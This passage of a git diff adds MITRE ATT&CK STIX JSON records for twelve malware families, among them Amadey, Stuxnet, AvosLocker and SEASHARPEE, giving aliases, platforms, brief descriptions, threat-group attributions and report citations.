"labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--05318127-5962-444b-b900-a9dcfe0ff6e9.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--05318127-5962-444b-b900-a9dcfe0ff6e9.json new file mode 100644 index 0000000000000000000000000000000000000000..f3b41c3d3b204f187bfde8bea727b1c9d72be42b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--05318127-5962-444b-b900-a9dcfe0ff6e9.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--18d46685-76b1-4413-95e9-0f25582a44a1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-14T21:33:47.608Z", + "name": "Amadey", + "description": "[Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Amadey" + ], + "type": "malware", + "id": "malware--05318127-5962-444b-b900-a9dcfe0ff6e9", + "created": "2022-07-14T17:30:54.927Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1025", + "external_id": "S1025" + }, + { + "source_name": "Korean FSI TA505 2020", + "description": "Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.", + "url": "https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=" + }, + { + "source_name": "BlackBerry Amadey 2020", + "description": "Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.", + "url": "https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--065196de-d7e8-4888-acfb-b2134022ba1b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--065196de-d7e8-4888-acfb-b2134022ba1b.json new file mode 100644 index 0000000000000000000000000000000000000000..1e64a2d2ffc1adaa4d505d54fe2c38a6fd75da49 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--065196de-d7e8-4888-acfb-b2134022ba1b.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--75d1c910-d5bf-4698-92ed-5fd2fe064e5d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "RDFSNIFFER" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--065196de-d7e8-4888-acfb-b2134022ba1b", + "type": "malware", + "created": "2019-10-11T16:13:19.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0416", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0416" + }, + { + "source_name": "FireEye FIN7 Oct 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html", + "description": "Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators\u2019 New Tools and Techniques. Retrieved October 11, 2019." + } + ], + "modified": "2019-10-16T15:34:22.990Z", + "name": "RDFSNIFFER", + "description": "[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--069af411-9b24-4e85-b26c-623d035bbe84.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--069af411-9b24-4e85-b26c-623d035bbe84.json new file mode 100644 index 0000000000000000000000000000000000000000..6bd14204fb105847bbdfb076d35a70c9634a1b6d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--069af411-9b24-4e85-b26c-623d035bbe84.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--1a1a3aab-117a-4c23-87c8-ba47cef0b11f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_aliases": [ + "Proxysvc" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--069af411-9b24-4e85-b26c-623d035bbe84", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0238", + "external_id": "S0238" + }, + { + "source_name": "Proxysvc", + "description": "(Citation: McAfee GhostSecret)" + }, + { + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/", + "description": "Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.", + "source_name": "McAfee GhostSecret" + } + ], + "modified": "2020-03-30T17:23:20.589Z", + "name": "Proxysvc", + "description": "[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. 
(Citation: McAfee GhostSecret)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--06d735e7-1db1-4dbe-ab4b-acbe419f902b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--06d735e7-1db1-4dbe-ab4b-acbe419f902b.json new file mode 100644 index 0000000000000000000000000000000000000000..95987f55361be617712b150363dff2f2a3b070a8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--06d735e7-1db1-4dbe-ab4b-acbe419f902b.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--8279cb7a-b195-417b-a225-c1d15e70750d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Orz", + "AIRBREAK" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--06d735e7-1db1-4dbe-ab4b-acbe419f902b", + "created": "2018-04-18T17:59:24.739Z", + "x_mitre_version": "2.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0229", + "url": "https://attack.mitre.org/software/S0229" + }, + { + "source_name": "AIRBREAK", + "description": "(Citation: FireEye Periscope March 2018)" + }, + { + "source_name": "Orz", + "description": "(Citation: Proofpoint Leviathan Oct 2017)" + }, + { + "source_name": "Proofpoint Leviathan Oct 2017", + "url": "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "description": "Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018." + }, + { + "source_name": "FireEye Periscope March 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. 
(Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)", + "modified": "2022-04-19T01:33:33.267Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Orz", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0715560d-4299-4e84-9e20-6e80ab57e4f2.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0715560d-4299-4e84-9e20-6e80ab57e4f2.json new file mode 100644 index 0000000000000000000000000000000000000000..2ac2eab331fb096e135e07476107825dfee0b8a5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0715560d-4299-4e84-9e20-6e80ab57e4f2.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--3fcdf0d9-203f-422d-8143-8144ac509a2d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-21T11:45:38.621Z", + "name": "Torisma", + "description": "[Torisma](https://attack.mitre.org/software/S0678) is a second stage implant designed for specialized monitoring that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [Torisma](https://attack.mitre.org/software/S0678) was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.(Citation: McAfee Lazarus Nov 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Torisma" + ], + "type": "malware", + "id": "malware--0715560d-4299-4e84-9e20-6e80ab57e4f2", + "created": "2022-02-01T16:21:13.097Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0678", + "external_id": "S0678" + }, + { + "source_name": "McAfee Lazarus Nov 2020", + "description": "Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--071d5d65-83ec-4a55-acfa-be7d5f28ba9a.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--071d5d65-83ec-4a55-acfa-be7d5f28ba9a.json new file mode 100644 index 0000000000000000000000000000000000000000..12fbad0c57242a9e9a827a46fd2852dc809bd748 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--071d5d65-83ec-4a55-acfa-be7d5f28ba9a.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--34fc2fe9-5c62-45e2-89ee-5cad0fb213d2", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "NOKKI" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--071d5d65-83ec-4a55-acfa-be7d5f28ba9a", + "type": "malware", + "created": "2019-01-30T19:50:45.307Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0353", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0353" + }, + { + "source_name": "NOKKI", + "description": "(Citation: Unit 42 NOKKI Sept 2018)" + }, + { + "source_name": "Unit 42 NOKKI Sept 2018", + "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", + "description": "Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018." + }, + { + "source_name": "Unit 42 Nokki Oct 2018", + "url": "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/", + "description": "Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018." + } + ], + "modified": "2020-03-18T15:22:32.747Z", + "name": "NOKKI", + "description": "[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. 
There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14.json new file mode 100644 index 0000000000000000000000000000000000000000..3bcc6976c349db361fcce4cd71ce8e4132573c9c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--318ea906-ca69-486d-ada5-cbf26d1b9d54", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "yty" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0248", + "external_id": "S0248" + }, + { + "source_name": "yty", + "description": "(Citation: ASERT Donot March 2018)" + }, + { + "source_name": "ASERT Donot March 2018", + "description": "Schwarz, D., Sopko J. (2018, March 08). Donot Team Leverages New Modular Malware Framework in South Asia. Retrieved June 11, 2018.", + "url": "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" + } + ], + "modified": "2020-03-28T21:45:32.149Z", + "name": "yty", + "description": "[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0852567d-7958-4f4b-8947-4f840ec8d57d.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0852567d-7958-4f4b-8947-4f840ec8d57d.json new file mode 100644 index 0000000000000000000000000000000000000000..163d997558576aaa9ee3d24f2819d1fa41002a85 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0852567d-7958-4f4b-8947-4f840ec8d57d.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--844a7d65-7f74-4c62-bc00-72a77d4c65c6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "DOGCALL" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0852567d-7958-4f4b-8947-4f840ec8d57d", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0213", + "external_id": "S0213" + }, + { + "source_name": "DOGCALL", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "FireEye APT37 Feb 2018", + "description": "FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" + } + ], + "modified": "2020-03-30T15:27:25.149Z", + "name": "DOGCALL", + "description": "[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json new file mode 100644 index 0000000000000000000000000000000000000000..7311d6400a52cc59b6c7b8067c6ecfcba8fa61ff --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json 
@@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--b73954e9-1892-4e9c-aefa-a084ce779c9c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T13:50:55.168Z", + "name": "Stuxnet", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) ", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "Stuxnet", + "W32.Stuxnet" + ], + "type": "malware", + "id": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "created": "2020-12-14T17:34:58.457Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0603", + "external_id": "S0603" + }, + { + "source_name": "W32.Stuxnet", + "description": "(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) " + }, + { + "source_name": "CISA ICS Advisory ICSA-10-272-01", + "description": "CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). 
Retrieved December 7, 2020.", + "url": "https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01" + }, + { + "source_name": "ESET Stuxnet Under the Microscope", + "description": "Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.", + "url": "https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--08d20cd2-f084-45ee-8558-fa6ef5a18519.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--08d20cd2-f084-45ee-8558-fa6ef5a18519.json new file mode 100644 index 0000000000000000000000000000000000000000..d651591b6f041605e1a2c91b6f901bed9147a11d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--08d20cd2-f084-45ee-8558-fa6ef5a18519.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--d20115c9-4eb5-4f08-8d12-1ded698b509a", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Downdelph", + "Delphacy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--08d20cd2-f084-45ee-8558-fa6ef5a18519", + "type": "malware", + "created": "2017-05-31T21:33:16.790Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0134", + "external_id": "S0134" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + } + ], + "modified": "2020-03-30T15:32:15.795Z", + "name": "Downdelph", + "description": "[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0945a1a5-a79a-47c8-9079-10c16cdfcb5d.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0945a1a5-a79a-47c8-9079-10c16cdfcb5d.json new file mode 100644 index 0000000000000000000000000000000000000000..8baaeef2e92711e3fe9ad60c1aacbfefde0df166 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0945a1a5-a79a-47c8-9079-10c16cdfcb5d.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--40d8d096-5f13-4b81-8825-487c92208802", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-15T17:03:59.324Z", + "name": "AvosLocker", + "description": "[AvosLocker](https://attack.mitre.org/software/S1053) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://attack.mitre.org/software/S1053) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Joint CSA AvosLocker Mar 2022)", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Flavio Costa, Cisco" + ], + "x_mitre_aliases": [ + "AvosLocker" + ], + "type": "malware", + "id": "malware--0945a1a5-a79a-47c8-9079-10c16cdfcb5d", + "created": "2023-01-11T21:17:36.149Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1053", + "external_id": "S1053" + }, + { + "source_name": "Joint CSA AvosLocker Mar 2022", + "description": "FBI, FinCEN, Treasury. (2022, March 17). Indicators of Compromise Associated with AvosLocker Ransomware. Retrieved January 11, 2023.", + "url": "https://www.ic3.gov/Media/News/2022/220318.pdf" + }, + { + "source_name": "Malwarebytes AvosLocker Jul 2021", + "description": "Hasherezade. (2021, July 23). AvosLocker enters the ransomware scene, asks for partners. 
Retrieved January 11, 2023.", + "url": "https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners" + }, + { + "source_name": "Trend Micro AvosLocker Apr 2022", + "description": "Trend Micro Research. (2022, April 4). Ransomware Spotlight AvosLocker. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0998045d-f96e-4284-95ce-3c8219707486.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0998045d-f96e-4284-95ce-3c8219707486.json new file mode 100644 index 0000000000000000000000000000000000000000..eb1d8d314b7c3240565e79afdefbd478eece1b64 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0998045d-f96e-4284-95ce-3c8219707486.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--f732578b-ed32-4f07-83e7-5e5dcbad95e7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "SEASHARPEE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0998045d-f96e-4284-95ce-3c8219707486", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0185", + "external_id": "S0185" + }, + { + "source_name": "SEASHARPEE", + "description": "(Citation: FireEye APT34 Webinar Dec 2017)" + }, + { + "url": "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "description": "Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.", + "source_name": "FireEye APT34 Webinar Dec 2017" + } + ], + "modified": "2021-04-23T20:29:59.216Z", + "name": "SEASHARPEE", + "description": "[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)", + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 